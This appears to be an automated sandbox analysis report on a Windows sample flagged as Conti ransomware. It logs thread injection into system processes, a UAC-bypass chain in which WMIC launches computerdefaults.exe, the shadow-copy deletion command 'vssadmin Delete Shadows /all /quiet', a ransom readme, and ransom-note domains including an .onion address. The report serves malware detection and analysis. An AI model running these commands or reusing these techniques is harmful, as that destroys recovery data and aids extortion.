    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 6076
    Sets debug register (to hijack the execution of another thread)Show sources
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: 2952 1BB026C0AB0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\sihost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\taskhostw.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\sihost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection412Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothProxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection412Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 419877 Sample: 7906dc47_by_Libranalysis Startdate: 21/05/2021 Architecture: WINDOWS Score: 100 82 Multi AV Scanner detection for submitted file 2->82 84 Found ransom note / readme 2->84 86 Yara detected Conti ransomware 2->86 88 6 other signatures 2->88 8 7906dc47_by_Libranalysis.exe 1 2->8         started        11 cmd.exe 1 2->11         started        13 cmd.exe 1 2->13         started        15 2 other processes 2->15 process3 signatures4 96 Sets debug register (to hijack the execution of another thread) 8->96 98 Modifies the context of a thread in another process (thread injection) 8->98 100 Maps a DLL or memory area into another process 8->100 102 Creates a thread in another existing process (thread injection) 8->102 17 sihost.exe 2 12 8->17 injected 21 taskhostw.exe 8->21 injected 23 svchost.exe 1 8->23 injected 25 svchost.exe 1 8->25 injected 27 ComputerDefaults.exe 1 15 11->27         started        29 conhost.exe 11->29         started        31 ComputerDefaults.exe 12 13->31         started        33 conhost.exe 13->33         started        35 4 other processes 15->35 process5 file6 72 C:\Users\user\Desktop\...\SUAVTZKNFL.pdf, data 17->72 dropped 74 C:\Users\user\Desktop\LSBIHQFDVT.docx, data 17->74 dropped 76 C:\Users\user\Desktop\...behaviorgraphAOBCVIQIJ.docx, data 17->76 dropped 80 2 other files (none is malicious) 17->80 dropped 90 Modifies existing user documents (likely ransomware behavior) 17->90 37 cmd.exe 1 17->37         started        39 cmd.exe 1 17->39         started        78 C:\Users\Public\readme.txt, ASCII 21->78 dropped 41 cmd.exe 1 23->41         started        43 cmd.exe 1 23->43         started        45 cmd.exe 25->45         started        47 cmd.exe 25->47         started        92 Creates processes via WMI 27->92 49 WMIC.exe 27->49         started        51 WMIC.exe 31->51         started        signatures7 process8 process9 53 WMIC.exe 1 37->53         started        56 conhost.exe 37->56         started        66 2 other processes 39->66 68 2 other processes 41->68 70 2 other processes 43->70 58 conhost.exe 45->58         started        60 conhost.exe 47->60         started        62 conhost.exe 49->62         started        64 conhost.exe 51->64         started        signatures10 94 Creates processes via WMI 53->94

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    7906dc47_by_Libranalysis.exe43%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzj0%Avira URL Cloudsafe
    http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
    https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzj0%Avira URL Cloudsafe
    http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj0%Avira URL Cloudsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
    http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
    http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
    http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
    http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzj0%Avira URL Cloudsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://%s.xboxlive.com0%URL Reputationsafe
    https://%s.xboxlive.com0%URL Reputationsafe
    https://%s.xboxlive.com0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0M0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0M0%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt0M0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
    http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%Avira URL Cloudsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
    http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
    http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
    http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
    http://www.msn.c0%Avira URL Cloudsafe
    https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt0%Avira URL Cloudsafe
    http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzj0%Avira URL Cloudsafe
    https://%s.dnet.xboxlive.com0%URL Reputationsafe
    https://%s.dnet.xboxlive.com0%URL Reputationsafe
    https://%s.dnet.xboxlive.com0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzjreadme.txt.3.drfalse
    • Avira URL Cloud: safe
    unknown
    http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatetaskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpfalse
      high
      https://login.windows.netsvchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpfalse
        high
        http://pki.goog/gsr2/GTS1O1.crt0#taskhostw.exe, 0000001E.00000002.501238733.00000255FA2F0000.00000008.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://aefd.nelreports.net/api/report?cat=bingthtaskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://xsts.auth.xboxlive.comsvchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpfalse
          high
          https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationtaskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpfalse
            high
            https://s.yimg.com/av/ads/1599143076228-3140.jpg=gdprtaskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpfalse
              high
              http://www.msn.comtaskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpfalse
                high
                https://deff.nelreports.net/api/report?cat=msntaskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://www.torproject.org/svchost.exe, svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp, taskhostw.exe, taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp, readme.txt.3.drfalse
                  high
                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jstaskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                    high
                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbftaskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.250058237.00000255F5875000.00000004.00000001.sdmpfalse
                      high
                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpfalse
                        high
                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpfalse
                          high
                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0ftaskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                            high
                            https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96etaskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpfalse
                              high
                              https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1taskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmpfalse
                                high
                                https://srtb.msn.com/auction?a=de-ch&b=9a5be529d6034927bda092231704a93b&c=MSN&d=http%3A%2F%2Fwww.msntaskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpfalse
                                  high
                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtaskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500649576.00000255F9F41000.00000004.00000001.sdmpfalse
                                    high
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpfalse
                                      high
                                      http://www.msn.com/?ocid=iehptaskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpfalse
                                        high
                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpfalse
                                          high
                                          http://crl.pki.goog/GTS1O1core.crl0taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tftaskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpfalse
                                            high
                                            http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzjreadme.txt.3.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzjreadme.txt.3.drtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://amplify-imp.outbrain.com/pixel?p=nlV1YHXXXKgnJTkmjxGkpD86h377hQIinq23IJiX9nqxEkupAtbFH4fSP0Iztaskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpfalse
                                              high
                                              http://crl.pki.goog/GTSGIAG3.crl0taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeetaskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                                                high
                                                https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.ctaskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://b1-use2.zemanta.com/bidder/win/outbrainrtb/c333bcb0-98dc-11e9-8919-320929a4a620/0.564833/3F66taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://pki.goog/gsr2/GTS1O1.crt0taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.msn.com/?ocid=iehpUtaskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpfalse
                                                      high
                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpfalse
                                                        high
                                                        https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmltaskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzjreadme.txt.3.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookietaskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpfalse
                                                            high
                                                            https://pki.goog/repository/0taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://%s.xboxlive.comsvchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            low
                                                            https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://pki.goog/gsr2/GTS1O1.crt0Mtaskhostw.exe, 0000001E.00000000.273188144.00000255FA370000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00ctaskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:autaskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.msn.com/de-ch/?ocid=iehptaskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    https://login.windows.net/svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634ataskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          https://aefd.nelreports.net/api/report?cat=bingaottaskhostw.exe, 0000001E.00000000.271595564.00000255F9DF8000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.jstaskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgtaskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://contextual.media.net/48/nrrV18753.jstaskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1?taskhostw.exe, 0000001E.00000002.501026757.00000255FA0C0000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://crl.pki.goog/gsr2/gsr2.crl0?taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://activity.windows.comsvchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp, svchost.exe, 00000004.00000000.235445986.0000024844045000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.msn.ctaskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gttaskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://policies.yahoo.com/w3c/p3p.xmltaskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzjreadme.txt.3.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://%s.dnet.xboxlive.comsvchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
